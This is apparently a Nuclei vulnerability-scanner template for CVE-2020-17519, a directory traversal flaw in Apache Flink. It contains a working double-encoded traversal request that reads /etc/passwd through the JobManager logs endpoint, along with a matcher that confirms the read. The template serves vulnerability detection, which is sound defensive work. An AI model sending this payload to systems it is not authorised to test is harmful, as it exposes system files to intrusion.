nuclei-templates/cves/2020/CVE-2020-17519.yaml

24 lines
769 B
YAML

id: CVE-2020-17519
info:
name: Apache Flink directory traversal
author: pdteam
severity: high
description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
reference: https://github.com/B1anda0/CVE-2020-17519
tags: cve,cve2020,apache,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body